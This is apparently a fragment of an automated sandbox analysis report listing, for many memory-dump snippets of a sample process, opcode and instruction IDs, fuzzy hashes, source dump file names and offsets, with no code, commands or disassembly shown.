                                                            • Opcode Fuzzy Hash: 4280b46e08dd5a575ec8cff98eea11902e4a7385f538151e3fc2ca14ab35f757
                                                            • Instruction Fuzzy Hash: 1251A370D19A1D8FDB94EF98C885BADB7F1FB58310F20826AD40CE3295DB3469868B54
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f48000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8c63bb57257e45cf4bf80a3821df01c4c7ea791753be3cb5584a88178372c032
                                                            • Instruction ID: e3c15c550becf0819c75abb4c75ba3b1dd5cccb8f500178463bf8f9f8e2715a6
                                                            • Opcode Fuzzy Hash: 8c63bb57257e45cf4bf80a3821df01c4c7ea791753be3cb5584a88178372c032
                                                            • Instruction Fuzzy Hash: EF51E774E0891D8FDB94EF58C894BA9B7B1FF68740F5041AAD40DE7292DB34A981CF40
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 884683d7e0c12c7984950d06604933db8c1fe2003ff04d33f215e63b83cfb51f
                                                            • Instruction ID: 3ea9beb4650a61586b26fc88217c2ac6fdb4026fb485d03ce39e45d8d3498641
                                                            • Opcode Fuzzy Hash: 884683d7e0c12c7984950d06604933db8c1fe2003ff04d33f215e63b83cfb51f
                                                            • Instruction Fuzzy Hash: C741D535E1C98A9FDB68FF6894516B8B7A5FF85350F104639D01DC36C2DE28BC028780
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3105215bd0e109af6eb3ae1f469338d1e047d9e6acc3cbb734906b4293c33a23
                                                            • Instruction ID: 6941aa283239b910fb3027eb34ef88373a315bc9e3d5a1b657c77cbac1d083b0
                                                            • Opcode Fuzzy Hash: 3105215bd0e109af6eb3ae1f469338d1e047d9e6acc3cbb734906b4293c33a23
                                                            • Instruction Fuzzy Hash: 0A51AA70D1892D8FDBA4EF14C854AE9B7B1FBA4341F1001EAD00DE3295DB36AE908F44
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a984b7ae125baecde7558f1cb93e4c7c2c6744cc40d3751f4f3dde984d4feefe
                                                            • Instruction ID: 4db4e299979139a4eae1ac6be87d05cf9d15230a52af22f39e7c2e0f13766bdf
                                                            • Opcode Fuzzy Hash: a984b7ae125baecde7558f1cb93e4c7c2c6744cc40d3751f4f3dde984d4feefe
                                                            • Instruction Fuzzy Hash: 9E417EB184D7C94FDB43DF6488555A5BFF0EF27210F0A40EBD489CB193EA289946C752
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c45b0e5cbcd3fb2b5b82e223d1458821c85afa8ddfc06bee7669ded5a86b337a
                                                            • Instruction ID: 29d993edeb68561fa78d8898820902a28afbd2f910f7f2630ab4e0790b54241c
                                                            • Opcode Fuzzy Hash: c45b0e5cbcd3fb2b5b82e223d1458821c85afa8ddfc06bee7669ded5a86b337a
                                                            • Instruction Fuzzy Hash: 4941A431A1C949DFDF98EF6CC455EA5B3E1FFA9310B0405AAD14EC7582CE24E882CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8fe303bbba97deafb57d991b1c79c768d742669d57a3e8696362a44ad8a43890
                                                            • Instruction ID: 8a35a28f1377cad88ee388ced6b65eadd305c24d68e8bd4470a07599bc907200
                                                            • Opcode Fuzzy Hash: 8fe303bbba97deafb57d991b1c79c768d742669d57a3e8696362a44ad8a43890
                                                            • Instruction Fuzzy Hash: E2418432A0C9498FDF99EF2CD495DA573E1FBAA310B0405A9D10EC3592DE35EC45CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1b5d72d91174adfc59d85de6ee471d2a3900ec1ed336804c48796873c6159b5
                                                            • Instruction ID: f9bac2c9fb3804cfa6044ed3cf537a5e80258e887c09b97e501deab5515e561a
                                                            • Opcode Fuzzy Hash: f1b5d72d91174adfc59d85de6ee471d2a3900ec1ed336804c48796873c6159b5
                                                            • Instruction Fuzzy Hash: 40316032A0C9458FDF99EF2CC455DA577E1FBAA310B0405A9D14AC7592CE39EC45CB82
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b5686eb4dabf045fddf52968d37404187ee9163f9a8b0366c2f5975a7eb0f1e
                                                            • Instruction ID: 212b2cbd74907c2546b81ed22fa35da56432489c65bb54b0e12e4c0ed90a9225
                                                            • Opcode Fuzzy Hash: 8b5686eb4dabf045fddf52968d37404187ee9163f9a8b0366c2f5975a7eb0f1e
                                                            • Instruction Fuzzy Hash: 89319031A1C9459FCF98EF2CC055EA573E1FFA9310B0406AED14EC7692CE24E882CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c05e85533ce407b647fdee0a3abaea78e9db1d8885de4af75454da2bb9078247
                                                            • Instruction ID: 0f6a55df7b1c207730edb2cbad76bb2c585f847c0b8f35dca1a31a2b7f09ed98
                                                            • Opcode Fuzzy Hash: c05e85533ce407b647fdee0a3abaea78e9db1d8885de4af75454da2bb9078247
                                                            • Instruction Fuzzy Hash: E4318132A0C9498FCF99EF2CC055DA573E1FBAA310B0405A9D10EC7592CE38EC85CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1769f78af62291e438c3cf59f937cf6856fa152b7b90f34a8cff8e9769fca0d7
                                                            • Instruction ID: 8bfeebf693d044b915239eec75594bdd4c040d8113e74c6f03882d531f627b57
                                                            • Opcode Fuzzy Hash: 1769f78af62291e438c3cf59f937cf6856fa152b7b90f34a8cff8e9769fca0d7
                                                            • Instruction Fuzzy Hash: AC316331A1C945DFCF98EF28C055EA573E1FFA931070445ADD14EC7596DE24E882CB85
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4039883e937d42b359302632310348bd29890745ce4ea471508d14d479ee9e83
                                                            • Instruction ID: 8f947d2dce09276250399d5068fff89ff1ad82e8fb458a307134ba492b6b7e4c
                                                            • Opcode Fuzzy Hash: 4039883e937d42b359302632310348bd29890745ce4ea471508d14d479ee9e83
                                                            • Instruction Fuzzy Hash: 31312E31E1C94A8FDB58EE5CD4919B8F7A1FF99754B508279D01ED3682CF28BC528B80
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa0ac8c07a9f68a8acaeacf6348d9ff659edf2ba2c02c3c90cc236e781244d72
                                                            • Instruction ID: 5a62cc7301f57c8eeeb11311c9954f2620420f18690e7afa3e2cd9a448cd48cf
                                                            • Opcode Fuzzy Hash: fa0ac8c07a9f68a8acaeacf6348d9ff659edf2ba2c02c3c90cc236e781244d72
                                                            • Instruction Fuzzy Hash: 8B31A431E1CAC68FEF69AB6C98522B8BBE1FF953A0F540179D05DC32C2DD2DA8054781
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d664eac73d9cc8fae692571712ff97d0eb7f70ecf2a401855b874dfcf14e620a
                                                            • Instruction ID: 997d1dde38b1113f1f7c1675e98c013e9f10d720d0c0ffafad63dda15a98d6e1
                                                            • Opcode Fuzzy Hash: d664eac73d9cc8fae692571712ff97d0eb7f70ecf2a401855b874dfcf14e620a
                                                            • Instruction Fuzzy Hash: E731E831D2EA8ADAEB60BB78D4510FA7BB0FF01398F180676D09D86083EE1CA415C795
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15e94c32eaa6b5b49100545a2544208768f340d617c3a80bc320e8784773f1c8
                                                            • Instruction ID: 3e9f40be371230d4065678b4df2f28d2d35a22c2b2fbed1291b48f7e881e9030
                                                            • Opcode Fuzzy Hash: 15e94c32eaa6b5b49100545a2544208768f340d617c3a80bc320e8784773f1c8
                                                            • Instruction Fuzzy Hash: C2313B3196C98E8FEFA8EF5484556BD77B7FF44340F50827AD60ED6581DB38A8408B41
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F26000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f26000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97ba7711df204a10d6d1dd6ba2d8884449818e56de419ca0b2f7dcfdae016111
                                                            • Instruction ID: 10a99d0289b308c0b931c3bfa7879080056bcda07e45cc72e69acf1cbda23a99
                                                            • Opcode Fuzzy Hash: 97ba7711df204a10d6d1dd6ba2d8884449818e56de419ca0b2f7dcfdae016111
                                                            • Instruction Fuzzy Hash: F7317E3185E6CC9FDB45EF6898596E97FB0FF15300F4404ABE804C6092EB389658C702
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e4b9ac7f8377d0861d136f78e42c32cf0d878cf9540b7607f56a59c9ae4df5f
                                                            • Instruction ID: 28a99706f3cdb4334fdb6908979dff1cdaaca5c4142541f6956a2497da26f121
                                                            • Opcode Fuzzy Hash: 5e4b9ac7f8377d0861d136f78e42c32cf0d878cf9540b7607f56a59c9ae4df5f
                                                            • Instruction Fuzzy Hash: 4F217B3274854A8FDB10AE2CF4403F9B394EFE13A2F10427BD448C78D0CAA6A44587C0
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ef2522cc21bf4f3d0645b40fd3aeb37a0cbb2099578ce55a323f5eaf1633544
                                                            • Instruction ID: e25273dd843ce426d401a7b1b5091fc76bc472184df0a528047032ee79848d93
                                                            • Opcode Fuzzy Hash: 4ef2522cc21bf4f3d0645b40fd3aeb37a0cbb2099578ce55a323f5eaf1633544
                                                            • Instruction Fuzzy Hash: 82317B3194891C8FDBA4DF14C855AE977B1FBA4341F1001EAD00EE3694DB769A948F40
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 399e614d9f22bf216261a30ae7f0234ec10dcdb07c3c7dd85b6e0fe4172d6103
                                                            • Instruction ID: 09a8076bc9659c0cc704f05d454b7bde9ff2928ad43afe72327cc1d1323fc593
                                                            • Opcode Fuzzy Hash: 399e614d9f22bf216261a30ae7f0234ec10dcdb07c3c7dd85b6e0fe4172d6103
                                                            • Instruction Fuzzy Hash: A331E330D1C98ADEEFA8EF58A4555BE76B2FF48340F54447AE40ED2281DE3DA9809B41
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2582ee46339f02721663c2e16bc44078810178c16a52ff987fea6826feb17ef
                                                            • Instruction ID: 01a0d0365db5fa599b0907dc6d1ddb634cf0aafc5af54dc8c74d202a1c7050ca
                                                            • Opcode Fuzzy Hash: b2582ee46339f02721663c2e16bc44078810178c16a52ff987fea6826feb17ef
                                                            • Instruction Fuzzy Hash: 2031291082C5D78FEF399A2C44A16B47F91EF42350B1C4EBAD086CB0D7D82CE881C381
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 084064736e9fd7b73ba5fbf2485081588cd905e8cad7cc10fb2ef2bcd179f734
                                                            • Instruction ID: 2a92c89907d9fa5c34585bebfa14b568bdd1b7e9b6ee2b2a5cc6575edcc818e7
                                                            • Opcode Fuzzy Hash: 084064736e9fd7b73ba5fbf2485081588cd905e8cad7cc10fb2ef2bcd179f734
                                                            • Instruction Fuzzy Hash: 4C21367148D7C98FDB439F7488255D57FF0EF17220B0901EBE484CB0A2D62D988ACB62
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81e6a8068012bcc539b7a084b711a8ca5d3214f3efea6053a303d52214f93be5
                                                            • Instruction ID: 2be7a9bd58593129d0c7ffd41537b6875c040752ae4a1f05c3b20b296da8a70c
                                                            • Opcode Fuzzy Hash: 81e6a8068012bcc539b7a084b711a8ca5d3214f3efea6053a303d52214f93be5
                                                            • Instruction Fuzzy Hash: 0031591081D9D64EEB3A961848685F07FA5EF42301B184BBAC08B8B4D7C52CF8838782
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1524141e6432fcd418be65c2028cf432e7e142c727300d42c2ecc8e8908a555
                                                            • Instruction ID: 4fb4e018be4fc7efa73afeb32cdd7cff6fc1ec09b72c86a9c3b5774e1a5178ee
                                                            • Opcode Fuzzy Hash: a1524141e6432fcd418be65c2028cf432e7e142c727300d42c2ecc8e8908a555
                                                            • Instruction Fuzzy Hash: F121D971E1891D9FDF99EF58D455AEDB7B1FF58300F0042AAD00EE3291CA35A981CB40
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7cd56706d9e47707605b71db4aa07bbf495eeb879f2d19f84bab14d2eb1af577
                                                            • Instruction ID: c3e37431df6bb2a4ae56ebbf50fc1baf2b8927c0e9d82a21fd767ad224298dbc
                                                            • Opcode Fuzzy Hash: 7cd56706d9e47707605b71db4aa07bbf495eeb879f2d19f84bab14d2eb1af577
                                                            • Instruction Fuzzy Hash: B1215B36A0C69E8FE702B768D8012ED7760EFC2361F044573C945DB1D1DB381909CB95
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4af30d6509284beb64c08229c0b853d0fcd4f7e5fd11e70fc26053a392ab024b
                                                            • Instruction ID: 9d5595b740f656ebe9ca406e8664c4455067b4e9ba2593287e2e6a416514f8a0
                                                            • Opcode Fuzzy Hash: 4af30d6509284beb64c08229c0b853d0fcd4f7e5fd11e70fc26053a392ab024b
                                                            • Instruction Fuzzy Hash: 2721F835D2EA8ADAEF64BF6894111FB7BB0FF00358F040676D19D96083EE2CA4058695
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73d7810355a126a6216b0263791534b912593610b0cd767534ecd6cca5674486
                                                            • Instruction ID: ce095ece13275b27a1127a03b809012a1dd20b3188cb88e8db027456a09f3ff1
                                                            • Opcode Fuzzy Hash: 73d7810355a126a6216b0263791534b912593610b0cd767534ecd6cca5674486
                                                            • Instruction Fuzzy Hash: 3631FA709099699FEB95EF58C859AE9B7B5FB59301F1041FAC00DE3291CB386AC5CF01
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba3547f289b940adf83d05af152872deb661c26a9976e402d59855fe46f9f3ca
                                                            • Instruction ID: 1065ce98af4cee04f78416a90e7c0010b5815b0ca5e920cd21149c48538dfea0
                                                            • Opcode Fuzzy Hash: ba3547f289b940adf83d05af152872deb661c26a9976e402d59855fe46f9f3ca
                                                            • Instruction Fuzzy Hash: 7721EB30A1891E8FEB84FB68D8949ADB7F1FF58350F10057AD419E3291DB34A981CB44
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd9bf320d5f9d3b7fb0e8b57983698b62546693a0748624e06873533c64a16d1
                                                            • Instruction ID: 7753c22695ef65ed69fe3c63b90c3e0767769d9f510d4f2b0b7d29dc7f929405
                                                            • Opcode Fuzzy Hash: cd9bf320d5f9d3b7fb0e8b57983698b62546693a0748624e06873533c64a16d1
                                                            • Instruction Fuzzy Hash: 7D213931D1C98D9FDFA8EF98D850AAD7BB1FF58340F500169D10AE7291DA28A9068B51
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7b040f0c369344548c63f0c03e35f682fed4bdeedc1daa89e892469cc444766
                                                            • Instruction ID: 7ced98ec52aa2bd5a76ec808147b43954d080ef9fe1f2d513251f956186fbc01
                                                            • Opcode Fuzzy Hash: c7b040f0c369344548c63f0c03e35f682fed4bdeedc1daa89e892469cc444766
                                                            • Instruction Fuzzy Hash: 2331C571D1852A8EEBA4EF14C8943A8B2F0BB58381F5451BAD44DA22D1DF346E84CF44
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09d2e46dbb1d2ac7cf55f1ba5290908a66794bd470e0be9b3ba1dae8ef921607
                                                            • Instruction ID: 3f30da70dd5bc78b16e3f903f2e3c1001240223057e73b56a782704842d8b85d
                                                            • Opcode Fuzzy Hash: 09d2e46dbb1d2ac7cf55f1ba5290908a66794bd470e0be9b3ba1dae8ef921607
                                                            • Instruction Fuzzy Hash: 9821E631E199499FDFADEB5CC455AADB7A1FF59310F0041BEE10EE3291CE38A9818B41
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f2cd668f4cab0b637dcd07324632e1dd90a3ada629900ee1f2ac5d222a999ac
                                                            • Instruction ID: 225d77f93f67065b18495c8e1d7398ba813ade268f3660410ec0816f730d0262
                                                            • Opcode Fuzzy Hash: 9f2cd668f4cab0b637dcd07324632e1dd90a3ada629900ee1f2ac5d222a999ac
                                                            • Instruction Fuzzy Hash: 68119D2092C8A74EFE38AA0884689F57B95EF50342B145B75C44B8B99BC92CF9839781
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e47b14df831958a04a62ee75f5a5e7d1c2a00312c1243f7eefcd66743a15489
                                                            • Instruction ID: 1bc7231e620c0069a75223cf66eb29d2b519f10120c60dc31af99802ae6664a6
                                                            • Opcode Fuzzy Hash: 1e47b14df831958a04a62ee75f5a5e7d1c2a00312c1243f7eefcd66743a15489
                                                            • Instruction Fuzzy Hash: 28118B7190DA8D8FDF91EB68D899AECBBA0EF64340F0405AAD409C7192DB34A990C740
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70c9806b5a40590f41d0d5ecf5063b8f95c65ca8350f1692a63f610792c9003f
                                                            • Instruction ID: e317b206a342712d59a260553b5de3a97bd70b1192dd9ecaf5cf9128357f75b6
                                                            • Opcode Fuzzy Hash: 70c9806b5a40590f41d0d5ecf5063b8f95c65ca8350f1692a63f610792c9003f
                                                            • Instruction Fuzzy Hash: 5A116D30A186498FDFA8EF1CC85563977E2FF99341F4041B9D04ED36A1CE28EC818B40
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ffa186ae97a5d07864437aba612f70dfbf241a5b646d9d830d0b51d667229e2d
                                                            • Instruction ID: 989e9b6590e93820adf8a6055e8fa48f384bd7b6486eb878119fd76e7931b3b9
                                                            • Opcode Fuzzy Hash: ffa186ae97a5d07864437aba612f70dfbf241a5b646d9d830d0b51d667229e2d
                                                            • Instruction Fuzzy Hash: B5112531A189498EDB20FF28E4415FA73A1EFD4391F404A3AE04EC38E2DE29F84583C0
                                                            Memory Dump Source
